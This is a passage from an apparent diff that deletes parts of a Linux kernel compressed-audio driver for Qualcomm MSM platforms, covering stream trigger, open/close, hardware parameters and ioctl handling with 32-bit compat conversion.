--		if (ret < 0)
--			pr_err("%s: CMD Format block failed: %d\n",
--				__func__, ret);
--		break;
--	default:
--		pr_debug("No config for codec %d\n", codec->id);
--	}
--	pr_debug("%s: Samp_rate = %d, Channel = %d, pcm_size = %d,\n"
--			 "pcm_count = %d, periods = %d\n",
--			 __func__, prtd->samp_rate, prtd->channel_mode,
--			 prtd->pcm_size, prtd->pcm_count, runtime->periods);
--
--	for (i = 0; i < runtime->periods; i++) {
--		read_param.uid = i;
--		switch (codec->id) {
--		case SND_AUDIOCODEC_AMRWB:
--			read_param.len = prtd->pcm_count
--					- COMPRE_CAPTURE_HEADER_SIZE;
--			read_param.paddr = buf[i].phys
--					+ COMPRE_CAPTURE_HEADER_SIZE;
--			pr_debug("Push buffer [%d] to DSP, paddr: %pa, vaddr: %pK\n",
--					i, &read_param.paddr,
--					buf[i].data);
--			q6asm_async_read(prtd->audio_client, &read_param);
--			break;
--		default:
--			read_param.paddr = buf[i].phys;
--			/*q6asm_async_read_compressed(prtd->audio_client,
--				&read_param);*/
--			pr_debug("%s: To add support for read compressed\n",
--								__func__);
--			ret = -EINVAL;
--			break;
--		}
--	}
--	prtd->periods = runtime->periods;
--
--	prtd->enabled = 1;
--
--	return ret;
--}
--
--static int msm_compr_trigger(struct snd_pcm_substream *substream, int cmd)
--{
--	int ret = 0;
--	struct snd_pcm_runtime *runtime = substream->runtime;
--	struct snd_soc_pcm_runtime *soc_prtd = substream->private_data;
--	struct compr_audio *compr = runtime->private_data;
--	struct msm_audio *prtd = &compr->prtd;
--
--	pr_debug("%s\n", __func__);
--	switch (cmd) {
--	case SNDRV_PCM_TRIGGER_START:
--		prtd->pcm_irq_pos = 0;
--
--		if (substream->stream == SNDRV_PCM_STREAM_CAPTURE) {
--			if (!msm_compr_capture_codecs(
--				compr->info.codec_param.codec.id)) {
--				/*
--				 * request codec invalid or not supported,
--				 * use default compress format
--				 */
--				compr->info.codec_param.codec.id =
--				SND_AUDIOCODEC_AMRWB;
--			}
--			switch (compr->info.codec_param.codec.id) {
--			case SND_AUDIOCODEC_AMRWB:
--				break;
--			default:
--				msm_pcm_routing_reg_psthr_stream(
--					soc_prtd->dai_link->be_id,
--					prtd->session_id, substream->stream);
--				break;
--			}
--		}
--		atomic_set(&prtd->pending_buffer, 1);
--	case SNDRV_PCM_TRIGGER_RESUME:
--	case SNDRV_PCM_TRIGGER_PAUSE_RELEASE:
--		pr_debug("%s: Trigger start\n", __func__);
--		q6asm_run_nowait(prtd->audio_client, 0, 0, 0);
--		atomic_set(&prtd->start, 1);
--		break;
--	case SNDRV_PCM_TRIGGER_STOP:
--		pr_debug("SNDRV_PCM_TRIGGER_STOP\n");
--		if (substream->stream == SNDRV_PCM_STREAM_CAPTURE) {
--			switch (compr->info.codec_param.codec.id) {
--			case SND_AUDIOCODEC_AMRWB:
--				break;
--			default:
--				msm_pcm_routing_reg_psthr_stream(
--					soc_prtd->dai_link->be_id,
--					prtd->session_id, substream->stream);
--				break;
--			}
--		}
--		atomic_set(&prtd->start, 0);
--		runtime->render_flag &= ~SNDRV_RENDER_STOPPED;
--		break;
--	case SNDRV_PCM_TRIGGER_SUSPEND:
--	case SNDRV_PCM_TRIGGER_PAUSE_PUSH:
--		pr_debug("SNDRV_PCM_TRIGGER_PAUSE\n");
--		q6asm_cmd_nowait(prtd->audio_client, CMD_PAUSE);
--		atomic_set(&prtd->start, 0);
--		runtime->render_flag &= ~SNDRV_RENDER_STOPPED;
--		break;
--	default:
--		ret = -EINVAL;
--		break;
--	}
--
--	return ret;
--}
--
--static void populate_codec_list(struct compr_audio *compr,
--		struct snd_pcm_runtime *runtime)
--{
--	pr_debug("%s\n", __func__);
--	/* MP3 Block */
--	compr->info.compr_cap.num_codecs = 5;
--	compr->info.compr_cap.min_fragment_size = runtime->hw.period_bytes_min;
--	compr->info.compr_cap.max_fragment_size = runtime->hw.period_bytes_max;
--	compr->info.compr_cap.min_fragments = runtime->hw.periods_min;
--	compr->info.compr_cap.max_fragments = runtime->hw.periods_max;
--	compr->info.compr_cap.codecs[0] = SND_AUDIOCODEC_MP3;
--	compr->info.compr_cap.codecs[1] = SND_AUDIOCODEC_AAC;
--	compr->info.compr_cap.codecs[2] = SND_AUDIOCODEC_AC3;
--	compr->info.compr_cap.codecs[3] = SND_AUDIOCODEC_EAC3;
--	compr->info.compr_cap.codecs[4] = SND_AUDIOCODEC_AMRWB;
--	/* Add new codecs here */
--}
--
--static int msm_compr_open(struct snd_pcm_substream *substream)
--{
--	struct snd_pcm_runtime *runtime = substream->runtime;
--	struct compr_audio *compr;
--	struct msm_audio *prtd;
--	int ret = 0;
--
--	pr_debug("%s\n", __func__);
--	compr = kzalloc(sizeof(struct compr_audio), GFP_KERNEL);
--	if (compr == NULL) {
--		pr_err("Failed to allocate memory for msm_audio\n");
--		return -ENOMEM;
--	}
--	prtd = &compr->prtd;
--	prtd->substream = substream;
--	runtime->render_flag = SNDRV_DMA_MODE;
--	prtd->audio_client = q6asm_audio_client_alloc(
--				(app_cb)compr_event_handler, compr);
--	if (!prtd->audio_client) {
--		pr_info("%s: Could not allocate memory\n", __func__);
--		kfree(prtd);
--		return -ENOMEM;
--	}
--
--	prtd->audio_client->perf_mode = false;
--	pr_info("%s: session ID %d\n", __func__, prtd->audio_client->session);
--
--	prtd->session_id = prtd->audio_client->session;
--
--	if (substream->stream == SNDRV_PCM_STREAM_PLAYBACK) {
--		runtime->hw = msm_compr_hardware_playback;
--		prtd->cmd_ack = 1;
--	} else {
--		runtime->hw = msm_compr_hardware_capture;
--	}
--
--
--	ret = snd_pcm_hw_constraint_list(runtime, 0,
--			SNDRV_PCM_HW_PARAM_RATE,
--			&constraints_sample_rates);
--	if (ret < 0)
--		pr_info("snd_pcm_hw_constraint_list failed\n");
--	/* Ensure that buffer size is a multiple of period size */
--	ret = snd_pcm_hw_constraint_integer(runtime,
--			    SNDRV_PCM_HW_PARAM_PERIODS);
--	if (ret < 0)
--		pr_info("snd_pcm_hw_constraint_integer failed\n");
--
--	prtd->dsp_cnt = 0;
--	atomic_set(&prtd->pending_buffer, 1);
--	if (substream->stream == SNDRV_PCM_STREAM_PLAYBACK)
--		compr->codec = FORMAT_MP3;
--	populate_codec_list(compr, runtime);
--	runtime->private_data = compr;
--	atomic_set(&prtd->eos, 0);
--	if (substream->stream == SNDRV_PCM_STREAM_PLAYBACK) {
--		if (!atomic_cmpxchg(&compressed_audio.audio_ocmem_req, 0, 1))
--			audio_ocmem_process_req(AUDIO, true);
--		else
--			atomic_inc(&compressed_audio.audio_ocmem_req);
--		pr_debug("%s: req: %d\n", __func__,
--			atomic_read(&compressed_audio.audio_ocmem_req));
--	}
--	return 0;
--}
--
--static int compressed_set_volume(struct msm_audio *prtd, uint32_t volume)
--{
--	int rc = 0;
--	int avg_vol = 0;
--	int lgain = (volume >> 16) & 0xFFFF;
--	int rgain = volume & 0xFFFF;
--	if (prtd && prtd->audio_client) {
--		pr_debug("%s: channels %d volume 0x%x\n", __func__,
--			prtd->channel_mode, volume);
--		if ((prtd->channel_mode == 2) &&
--			(lgain != rgain)) {
--			pr_debug("%s: call q6asm_set_lrgain\n", __func__);
--			rc = q6asm_set_lrgain(prtd->audio_client, lgain, rgain);
--		} else {
--			avg_vol = (lgain + rgain)/2;
--			pr_debug("%s: call q6asm_set_volume\n", __func__);
--			rc = q6asm_set_volume(prtd->audio_client, avg_vol);
--		}
--		if (rc < 0) {
--			pr_err("%s: Send Volume command failed rc=%d\n",
--				__func__, rc);
--		}
--	}
--	return rc;
--}
--
--static int msm_compr_playback_close(struct snd_pcm_substream *substream)
--{
--	struct snd_pcm_runtime *runtime = substream->runtime;
--	struct snd_soc_pcm_runtime *soc_prtd = substream->private_data;
--	struct compr_audio *compr = runtime->private_data;
--	struct msm_audio *prtd = &compr->prtd;
--	int dir = 0;
--
--	pr_debug("%s\n", __func__);
--
--	dir = IN;
--	atomic_set(&prtd->pending_buffer, 0);
--
--	if (atomic_read(&compressed_audio.audio_ocmem_req) > 1)
--		atomic_dec(&compressed_audio.audio_ocmem_req);
--	else if (atomic_cmpxchg(&compressed_audio.audio_ocmem_req, 1, 0))
--		audio_ocmem_process_req(AUDIO, false);
--
--	pr_debug("%s: req: %d\n", __func__,
--		atomic_read(&compressed_audio.audio_ocmem_req));
--	prtd->pcm_irq_pos = 0;
--	q6asm_cmd(prtd->audio_client, CMD_CLOSE);
--	q6asm_audio_client_buf_free_contiguous(dir,
--				prtd->audio_client);
--		msm_pcm_routing_dereg_phy_stream(
--			soc_prtd->dai_link->be_id,
--			SNDRV_PCM_STREAM_PLAYBACK);
--	q6asm_audio_client_free(prtd->audio_client);
--	kfree(prtd);
--	return 0;
--}
--
--static int msm_compr_capture_close(struct snd_pcm_substream *substream)
--{
--	struct snd_pcm_runtime *runtime = substream->runtime;
--	struct snd_soc_pcm_runtime *soc_prtd = substream->private_data;
--	struct compr_audio *compr = runtime->private_data;
--	struct msm_audio *prtd = &compr->prtd;
--	int dir = OUT;
--
--	pr_debug("%s\n", __func__);
--	atomic_set(&prtd->pending_buffer, 0);
--	q6asm_cmd(prtd->audio_client, CMD_CLOSE);
--	q6asm_audio_client_buf_free_contiguous(dir,
--				prtd->audio_client);
--	msm_pcm_routing_dereg_phy_stream(soc_prtd->dai_link->be_id,
--				SNDRV_PCM_STREAM_CAPTURE);
--	q6asm_audio_client_free(prtd->audio_client);
--	kfree(prtd);
--	return 0;
--}
--
--static int msm_compr_close(struct snd_pcm_substream *substream)
--{
--	int ret = 0;
--
--	if (substream->stream == SNDRV_PCM_STREAM_PLAYBACK)
--		ret = msm_compr_playback_close(substream);
--	else if (substream->stream == SNDRV_PCM_STREAM_CAPTURE)
--		ret = msm_compr_capture_close(substream);
--	return ret;
--}
--
--static int msm_compr_prepare(struct snd_pcm_substream *substream)
--{
--	int ret = 0;
--
--	if (substream->stream == SNDRV_PCM_STREAM_PLAYBACK)
--		ret = msm_compr_playback_prepare(substream);
--	else if (substream->stream == SNDRV_PCM_STREAM_CAPTURE)
--		ret = msm_compr_capture_prepare(substream);
--	return ret;
--}
--
--static snd_pcm_uframes_t msm_compr_pointer(struct snd_pcm_substream *substream)
--{
--
--	struct snd_pcm_runtime *runtime = substream->runtime;
--	struct compr_audio *compr = runtime->private_data;
--	struct msm_audio *prtd = &compr->prtd;
--
--	if (prtd->pcm_irq_pos >= prtd->pcm_size)
--		prtd->pcm_irq_pos = 0;
--
--	pr_debug("%s: pcm_irq_pos = %d, pcm_size = %d, sample_bits = %d,\n"
--			 "frame_bits = %d\n", __func__, prtd->pcm_irq_pos,
--			 prtd->pcm_size, runtime->sample_bits,
--			 runtime->frame_bits);
--	return bytes_to_frames(runtime, (prtd->pcm_irq_pos));
--}
--
--static int msm_compr_mmap(struct snd_pcm_substream *substream,
--				struct vm_area_struct *vma)
--{
--	struct snd_pcm_runtime *runtime = substream->runtime;
--	struct msm_audio *prtd = runtime->private_data;
--	struct audio_client *ac = prtd->audio_client;
--	struct audio_port_data *apd = ac->port;
--	struct audio_buffer *ab;
--	int dir = -1;
--
--	prtd->mmap_flag = 1;
--	runtime->render_flag = SNDRV_NON_DMA_MODE;
--	if (substream->stream == SNDRV_PCM_STREAM_PLAYBACK)
--		dir = IN;
--	else
--		dir = OUT;
--	ab = &(apd[dir].buf[0]);
--
--	return msm_audio_ion_mmap(ab, vma);
--}
--
--static int msm_compr_hw_params(struct snd_pcm_substream *substream,
--				struct snd_pcm_hw_params *params)
--{
--	struct snd_pcm_runtime *runtime = substream->runtime;
--	struct compr_audio *compr = runtime->private_data;
--	struct msm_audio *prtd = &compr->prtd;
--	struct snd_dma_buffer *dma_buf = &substream->dma_buffer;
--	struct audio_buffer *buf;
--	int dir, ret;
--
--	if (substream->stream == SNDRV_PCM_STREAM_PLAYBACK)
--		dir = IN;
--	else
--		dir = OUT;
--	/* Modifying kernel hardware params based on userspace config */
--	if (params_periods(params) > 0 &&
--		(params_periods(params) != runtime->hw.periods_max)) {
--		runtime->hw.periods_max = params_periods(params);
--	}
--	if (params_period_bytes(params) > 0 &&
--		(params_period_bytes(params) != runtime->hw.period_bytes_min)) {
--		runtime->hw.period_bytes_min = params_period_bytes(params);
--	}
--	runtime->hw.buffer_bytes_max =
--			runtime->hw.period_bytes_min * runtime->hw.periods_max;
--	pr_debug("allocate %zd buffers each of size %d\n",
--		runtime->hw.period_bytes_min,
--		runtime->hw.periods_max);
--	ret = q6asm_audio_client_buf_alloc_contiguous(dir,
--			prtd->audio_client,
--			runtime->hw.period_bytes_min,
--			runtime->hw.periods_max);
--	if (ret < 0) {
--		pr_err("Audio Start: Buffer Allocation failed rc = %d\n",
--						ret);
--		return -ENOMEM;
--	}
--	buf = prtd->audio_client->port[dir].buf;
--
--	dma_buf->dev.type = SNDRV_DMA_TYPE_DEV;
--	dma_buf->dev.dev = substream->pcm->card->dev;
--	dma_buf->private_data = NULL;
--	dma_buf->area = buf[0].data;
--	dma_buf->addr =  buf[0].phys;
--	dma_buf->bytes = runtime->hw.buffer_bytes_max;
--
--	pr_debug("%s: buf[%pK]dma_buf->area[%pK]dma_buf->addr[%pa]\n"
--		 "dma_buf->bytes[%zd]\n", __func__,
--		 (void *)buf, (void *)dma_buf->area,
--		 &dma_buf->addr, dma_buf->bytes);
--	if (!dma_buf->area)
--		return -ENOMEM;
--
--	snd_pcm_set_runtime_buffer(substream, &substream->dma_buffer);
--	return 0;
--}
--
--static int msm_compr_ioctl_shared(struct snd_pcm_substream *substream,
--		unsigned int cmd, void *arg)
--{
--	int rc = 0;
--	struct snd_pcm_runtime *runtime = substream->runtime;
--	struct compr_audio *compr = runtime->private_data;
--	struct msm_audio *prtd = &compr->prtd;
--	uint64_t timestamp;
--	uint64_t temp;
--
--	switch (cmd) {
--	case SNDRV_COMPRESS_TSTAMP: {
--		struct snd_compr_tstamp *tstamp;
--		pr_debug("SNDRV_COMPRESS_TSTAMP\n");
--		tstamp = arg;
--		memset(tstamp, 0x0, sizeof(*tstamp));
--		rc = q6asm_get_session_time(prtd->audio_client, &timestamp);
--		if (rc < 0) {
--			pr_err("%s: Get Session Time return value =%lld\n",
--				__func__, timestamp);
--			return -EAGAIN;
--		}
--		temp = (timestamp * 2 * runtime->channels);
--		temp = temp * (runtime->rate/1000);
--		temp = div_u64(temp, 1000);
--		tstamp->sampling_rate = runtime->rate;
--		tstamp->timestamp = timestamp;
--		pr_debug("%s: bytes_consumed:,timestamp = %lld,\n",
--						__func__,
--			tstamp->timestamp);
--		return 0;
--	}
--	case SNDRV_COMPRESS_GET_CAPS: {
--		struct snd_compr_caps *caps;
--		caps = arg;
--		memset(caps, 0, sizeof(*caps));
--		pr_debug("SNDRV_COMPRESS_GET_CAPS\n");
--		memcpy(caps, &compr->info.compr_cap, sizeof(*caps));
--		return 0;
--	}
--	case SNDRV_COMPRESS_SET_PARAMS:
--		pr_debug("SNDRV_COMPRESS_SET_PARAMS:\n");
--		memcpy(&compr->info.codec_param, (void *) arg,
--			sizeof(struct snd_compr_params));
--		switch (compr->info.codec_param.codec.id) {
--		case SND_AUDIOCODEC_MP3:
--			/* For MP3 we dont need any other parameter */
--			pr_debug("SND_AUDIOCODEC_MP3\n");
--			compr->codec = FORMAT_MP3;
--			break;
--		case SND_AUDIOCODEC_AAC:
--			pr_debug("SND_AUDIOCODEC_AAC\n");
--			compr->codec = FORMAT_MPEG4_AAC;
--			break;
--		case SND_AUDIOCODEC_AC3: {
--			char params_value[MAX_AC3_PARAM_SIZE];
--			int *params_value_data = (int *)params_value;
--			/* 36 is the max param length for ddp */
--			int i;
--			struct snd_dec_ddp *ddp =
--				&compr->info.codec_param.codec.options.ddp;
--			uint32_t params_length = 0;
--			memset(params_value, 0, MAX_AC3_PARAM_SIZE);
--			/* check integer overflow */
--			if (ddp->params_length > UINT_MAX/sizeof(int)) {
--				pr_err("%s: Integer overflow ddp->params_length %d\n",
--				__func__, ddp->params_length);
--				return -EINVAL;
--			}
--			params_length = ddp->params_length*sizeof(int);
--			if (params_length > MAX_AC3_PARAM_SIZE) {
--				/*MAX is 36*sizeof(int) this should not happen*/
--				pr_err("%s: params_length(%d) is greater than %zd\n",
--				__func__, params_length, MAX_AC3_PARAM_SIZE);
--				return -EINVAL;
--			}
--			pr_debug("SND_AUDIOCODEC_AC3\n");
--			compr->codec = FORMAT_AC3;
--			pr_debug("params_length: %d\n", ddp->params_length);
--			for (i = 0; i < params_length/sizeof(int); i++)
--				pr_debug("params_value[%d]: %x\n", i,
--					params_value_data[i]);
--			for (i = 0; i < ddp->params_length/2; i++) {
--				ddp->params_id[i] = params_value_data[2*i];
--				ddp->params_value[i] = params_value_data[2*i+1];
--			}
--			if (atomic_read(&prtd->start)) {
--				rc = msm_compr_send_ddp_cfg(prtd->audio_client,
--								ddp);
--				if (rc < 0)
--					pr_err("%s: DDP CMD CFG failed\n",
--						__func__);
--			}
--			break;
--		}
--		case SND_AUDIOCODEC_EAC3: {
--			char params_value[MAX_AC3_PARAM_SIZE];
--			int *params_value_data = (int *)params_value;
--			/* 36 is the max param length for ddp */
--			int i;
--			struct snd_dec_ddp *ddp =
--				&compr->info.codec_param.codec.options.ddp;
--			uint32_t params_length = 0;
--			memset(params_value, 0, MAX_AC3_PARAM_SIZE);
--			/* check integer overflow */
--			if (ddp->params_length > UINT_MAX/sizeof(int)) {
--				pr_err("%s: Integer overflow ddp->params_length %d\n",
--				__func__, ddp->params_length);
--				return -EINVAL;
--			}
--                        params_length = ddp->params_length*sizeof(int);
--			if (params_length > MAX_AC3_PARAM_SIZE) {
--				/*MAX is 36*sizeof(int) this should not happen*/
--				pr_err("%s: params_length(%d) is greater than %zd\n",
--				__func__, params_length, MAX_AC3_PARAM_SIZE);
--				return -EINVAL;
--			}
--			pr_debug("SND_AUDIOCODEC_EAC3\n");
--			compr->codec = FORMAT_EAC3;
--			pr_debug("params_length: %d\n", ddp->params_length);
--			for (i = 0; i < ddp->params_length; i++)
--				pr_debug("params_value[%d]: %x\n", i,
--					params_value_data[i]);
--			for (i = 0; i < ddp->params_length/2; i++) {
--				ddp->params_id[i] = params_value_data[2*i];
--				ddp->params_value[i] = params_value_data[2*i+1];
--			}
--			if (atomic_read(&prtd->start)) {
--				rc = msm_compr_send_ddp_cfg(prtd->audio_client,
--								ddp);
--				if (rc < 0)
--					pr_err("%s: DDP CMD CFG failed\n",
--						__func__);
--			}
--			break;
--		}
--		default:
--			pr_debug("FORMAT_LINEAR_PCM\n");
--			compr->codec = FORMAT_LINEAR_PCM;
--			break;
--		}
--		return 0;
--	case SNDRV_PCM_IOCTL1_RESET:
--		pr_debug("SNDRV_PCM_IOCTL1_RESET\n");
--		/* Flush only when session is started during CAPTURE,
--		   while PLAYBACK has no such restriction. */
--		if (substream->stream == SNDRV_PCM_STREAM_PLAYBACK ||
--			  (substream->stream == SNDRV_PCM_STREAM_CAPTURE &&
--						atomic_read(&prtd->start))) {
--			if (atomic_read(&prtd->eos)) {
--				prtd->cmd_interrupt = 1;
--				wake_up(&the_locks.eos_wait);
--				atomic_set(&prtd->eos, 0);
--			}
--
--			/* A unlikely race condition possible with FLUSH
--			   DRAIN if ack is set by flush and reset by drain */
--			prtd->cmd_ack = 0;
--			rc = q6asm_cmd(prtd->audio_client, CMD_FLUSH);
--			if (rc < 0) {
--				pr_err("%s: flush cmd failed rc=%d\n",
--					__func__, rc);
--				return rc;
--			}
--			rc = wait_event_timeout(the_locks.flush_wait,
--				prtd->cmd_ack, 5 * HZ);
--			if (!rc)
--				pr_err("Flush cmd timeout\n");
--			prtd->pcm_irq_pos = 0;
--		}
--		break;
--	case SNDRV_COMPRESS_DRAIN:
--		pr_debug("%s: SNDRV_COMPRESS_DRAIN\n", __func__);
--		if (atomic_read(&prtd->pending_buffer)) {
--			pr_debug("%s: no pending writes, drain would block\n",
--			 __func__);
--			return -EWOULDBLOCK;
--		}
--
--		atomic_set(&prtd->eos, 1);
--		atomic_set(&prtd->pending_buffer, 0);
--		prtd->cmd_ack = 0;
--		q6asm_cmd_nowait(prtd->audio_client, CMD_EOS);
--		/* Wait indefinitely for  DRAIN. Flush can also signal this*/
--		rc = wait_event_interruptible(the_locks.eos_wait,
--			(prtd->cmd_ack || prtd->cmd_interrupt));
--
--		if (rc < 0)
--			pr_err("EOS cmd interrupted\n");
--		pr_debug("%s: SNDRV_COMPRESS_DRAIN  out of wait\n", __func__);
--
--		if (prtd->cmd_interrupt)
--			rc = -EINTR;
--
--		prtd->cmd_interrupt = 0;
--		return rc;
--	default:
--		break;
--	}
--	return snd_pcm_lib_ioctl(substream, cmd, arg);
--}
--#ifdef CONFIG_COMPAT
--struct snd_enc_wma32 {
--	u32 super_block_align; /* WMA Type-specific data */
--	u32 encodeopt1;
--	u32 encodeopt2;
--};
--
--struct snd_enc_vorbis32 {
--	s32 quality;
--	u32 managed;
--	u32 max_bit_rate;
--	u32 min_bit_rate;
--	u32 downmix;
--};
--
--struct snd_enc_real32 {
--	u32 quant_bits;
--	u32 start_region;
--	u32 num_regions;
--};
--
--struct snd_enc_flac32 {
--	u32 num;
--	u32 gain;
--};
--
--struct snd_enc_generic32 {
--	u32 bw;	/* encoder bandwidth */
--	s32 reserved[15];
--};
--struct snd_dec_ddp32 {
--	u32 params_length;
--	u32 params_id[18];
--	u32 params_value[18];
--};
--
--union snd_codec_options32 {
--	struct snd_enc_wma32 wma;
--	struct snd_enc_vorbis32 vorbis;
--	struct snd_enc_real32 real;
--	struct snd_enc_flac32 flac;
--	struct snd_enc_generic32 generic;
--	struct snd_dec_ddp32 ddp;
--};
--
--struct snd_codec32 {
--	u32 id;
--	u32 ch_in;
--	u32 ch_out;
--	u32 sample_rate;
--	u32 bit_rate;
--	u32 rate_control;
--	u32 profile;
--	u32 level;
--	u32 ch_mode;
--	u32 format;
--	u32 align;
--	union snd_codec_options32 options;
--	u32 reserved[3];
--};
--
--struct snd_compressed_buffer32 {
--	u32 fragment_size;
--	u32 fragments;
--};
--
--struct snd_compr_params32 {
--	struct snd_compressed_buffer32 buffer;
--	struct snd_codec32 codec;
--	u8 no_wake_mode;
--};
--
--struct snd_compr_caps32 {
--	u32 num_codecs;
--	u32 direction;
--	u32 min_fragment_size;
--	u32 max_fragment_size;
--	u32 min_fragments;
--	u32 max_fragments;
--	u32 codecs[MAX_NUM_CODECS];
--	u32 reserved[11];
--};
--struct snd_compr_tstamp32 {
--	u32 byte_offset;
--	u32 copied_total;
--	compat_ulong_t pcm_frames;
--	compat_ulong_t pcm_io_frames;
--	u32 sampling_rate;
--	compat_u64 timestamp;
--};
--enum {
--	SNDRV_COMPRESS_TSTAMP32 = _IOR('C', 0x20, struct snd_compr_tstamp32),
--	SNDRV_COMPRESS_GET_CAPS32 = _IOWR('C', 0x10, struct snd_compr_caps32),
--	SNDRV_COMPRESS_SET_PARAMS32 =
--	_IOW('C', 0x12, struct snd_compr_params32),
--};
--static int msm_compr_compat_ioctl(struct snd_pcm_substream *substream,
--		unsigned int cmd, void *arg)
--{
--	int err = 0;
--	switch (cmd) {
--	case SNDRV_COMPRESS_TSTAMP32: {
--		struct snd_compr_tstamp tstamp;
--		struct snd_compr_tstamp32 tstamp32;
--		memset(&tstamp, 0, sizeof(tstamp));
--		memset(&tstamp32, 0, sizeof(tstamp32));
--		cmd = SNDRV_COMPRESS_TSTAMP;
--		err = msm_compr_ioctl_shared(substream, cmd, &tstamp);
--		if (err) {
--			pr_err("%s: COMPRESS_TSTAMP failed rc %d\n",
--			__func__, err);
--			goto bail_out;
--		}
--		tstamp32.byte_offset = tstamp.byte_offset;
--		tstamp32.copied_total = tstamp.copied_total;
--		tstamp32.pcm_frames = tstamp.pcm_frames;
--		tstamp32.pcm_io_frames = tstamp.pcm_io_frames;
--		tstamp32.sampling_rate = tstamp.sampling_rate;
--		tstamp32.timestamp = tstamp.timestamp;
--		if (copy_to_user(arg, &tstamp32, sizeof(tstamp32))) {
--			pr_err("%s: copytouser failed COMPRESS_TSTAMP32\n",
--			__func__);
--			err = -EFAULT;
--		}
--		break;
--	}
--	case SNDRV_COMPRESS_GET_CAPS32: {
--		struct snd_compr_caps caps;
--		struct snd_compr_caps32 caps32;
--		u32 i;
--		memset(&caps, 0, sizeof(caps));
--		memset(&caps32, 0, sizeof(caps32));
--		cmd = SNDRV_COMPRESS_GET_CAPS;
--		err = msm_compr_ioctl_shared(substream, cmd, &caps);
--		if (err) {
--			pr_err("%s: GET_CAPS failed rc %d\n",
--			__func__, err);
--			goto bail_out;
--		}
--		pr_debug("SNDRV_COMPRESS_GET_CAPS_32\n");
--		if (!err && caps.num_codecs >= MAX_NUM_CODECS) {
--			pr_err("%s: Invalid number of codecs\n", __func__);
--			err = -EINVAL;
--			goto bail_out;
--		}
--		caps32.direction = caps.direction;
--		caps32.max_fragment_size = caps.max_fragment_size;
--		caps32.max_fragments = caps.max_fragments;
--		caps32.min_fragment_size = caps.min_fragment_size;
--		caps32.num_codecs = caps.num_codecs;
--		for (i = 0; i < caps.num_codecs; i++)
--			caps32.codecs[i] = caps.codecs[i];
--		if (copy_to_user(arg, &caps32, sizeof(caps32))) {
--			pr_err("%s: copytouser failed COMPRESS_GETCAPS32\n",
--			__func__);
--			err = -EFAULT;
--		}
--		break;
--	}
--	case SNDRV_COMPRESS_SET_PARAMS32: {
--		struct snd_compr_params32 params32;
--		struct snd_compr_params params;
--		memset(&params32, 0 , sizeof(params32));
--		memset(&params, 0 , sizeof(params));
--		cmd = SNDRV_COMPRESS_SET_PARAMS;
--		if (copy_from_user(&params32, arg, sizeof(params32))) {
--			pr_err("%s: copyfromuser failed SET_PARAMS32\n",
--			__func__);
--			err = -EFAULT;
--			goto bail_out;
--		}
--		params.no_wake_mode = params32.no_wake_mode;
--		params.codec.id = params32.codec.id;
--		params.codec.ch_in = params32.codec.ch_in;
--		params.codec.ch_out = params32.codec.ch_out;
--		params.codec.sample_rate = params32.codec.sample_rate;
--		params.codec.bit_rate = params32.codec.bit_rate;
--		params.codec.rate_control = params32.codec.rate_control;
--		params.codec.profile = params32.codec.profile;
--		params.codec.level = params32.codec.level;
--		params.codec.ch_mode = params32.codec.ch_mode;
--		params.codec.format = params32.codec.format;
--		params.codec.align = params32.codec.align;
--
--		switch (params.codec.id) {
--		case SND_AUDIOCODEC_WMA:
--		case SND_AUDIOCODEC_WMA_PRO:
--			params.codec.options.wma.encodeopt1 =
--			params32.codec.options.wma.encodeopt1;
--			params.codec.options.wma.encodeopt2 =
--			params32.codec.options.wma.encodeopt2;
--			params.codec.options.wma.super_block_align =
--			params32.codec.options.wma.super_block_align;
--		break;
--		case SND_AUDIOCODEC_VORBIS:
--			params.codec.options.vorbis.downmix =
--			params32.codec.options.vorbis.downmix;
--			params.codec.options.vorbis.managed =
--			params32.codec.options.vorbis.managed;
--			params.codec.options.vorbis.max_bit_rate =
--			params32.codec.options.vorbis.max_bit_rate;
--			params.codec.options.vorbis.min_bit_rate =
--			params32.codec.options.vorbis.min_bit_rate;
--			params.codec.options.vorbis.quality =
--			params32.codec.options.vorbis.quality;
--		break;
--		case SND_AUDIOCODEC_REAL:
--			params.codec.options.real.num_regions =
--			params32.codec.options.real.num_regions;
--			params.codec.options.real.quant_bits =
--			params32.codec.options.real.quant_bits;
--			params.codec.options.real.start_region =
--			params32.codec.options.real.start_region;
--		break;
--		case SND_AUDIOCODEC_FLAC:
--			params.codec.options.flac.gain =
--			params32.codec.options.flac.gain;
--			params.codec.options.flac.num =
--			params32.codec.options.flac.num;
--		break;
--		case SND_AUDIOCODEC_DTS:
--		case SND_AUDIOCODEC_DTS_PASS_THROUGH:
--		case SND_AUDIOCODEC_DTS_LBR:
--		case SND_AUDIOCODEC_DTS_LBR_PASS_THROUGH:
--		case SND_AUDIOCODEC_DTS_TRANSCODE_LOOPBACK:
--		break;
--		case SND_AUDIOCODEC_AC3:
--		case SND_AUDIOCODEC_EAC3:
--			params.codec.options.ddp.params_length =
--			params32.codec.options.ddp.params_length;
--			memcpy(params.codec.options.ddp.params_value,
--			params32.codec.options.ddp.params_value,
--			sizeof(params32.codec.options.ddp.params_value));
--			memcpy(params.codec.options.ddp.params_id,
--			params32.codec.options.ddp.params_id,
--			sizeof(params32.codec.options.ddp.params_id));
--		break;
--		default:
--			params.codec.options.generic.bw =
--			params32.codec.options.generic.bw;
--		break;
--		}
--		if (!err)
--			err = msm_compr_ioctl_shared(substream, cmd, &params);
--		break;
--	}
--	default:
--		err = msm_compr_ioctl_shared(substream, cmd, arg);
--	}
--bail_out:
--	return err;
--
--}
--#endif
--static int msm_compr_ioctl(struct snd_pcm_substream *substream,
--		unsigned int cmd, void *arg)
--{
--	int err = 0;
--	if (!substream) {
--		pr_err("%s: Invalid params\n", __func__);
--		return -EINVAL;
--	}
--	pr_debug("%s called with cmd = %d\n", __func__, cmd);
--	switch (cmd) {
--	case SNDRV_COMPRESS_TSTAMP: {
--		struct snd_compr_tstamp tstamp;
--		if (!arg) {
--			pr_err("%s: Invalid params Tstamp\n", __func__);
--			return -EINVAL;
--		}
--		err = msm_compr_ioctl_shared(substream, cmd, &tstamp);
--		if (err)
--			pr_err("%s: COMPRESS_TSTAMP failed rc %d\n",
--			__func__, err);
--		if (!err && copy_to_user(arg, &tstamp, sizeof(tstamp))) {
--			pr_err("%s: copytouser failed COMPRESS_TSTAMP\n",
--			__func__);
--			err = -EFAULT;
--		}
--		break;
--	}
--	case SNDRV_COMPRESS_GET_CAPS: {
--		struct snd_compr_caps cap;
--		if (!arg) {
--			pr_err("%s: Invalid params getcaps\n", __func__);
--			return -EINVAL;
--		}
--		pr_debug("SNDRV_COMPRESS_GET_CAPS\n");
--		err = msm_compr_ioctl_shared(substream, cmd, &cap);
--		if (err)
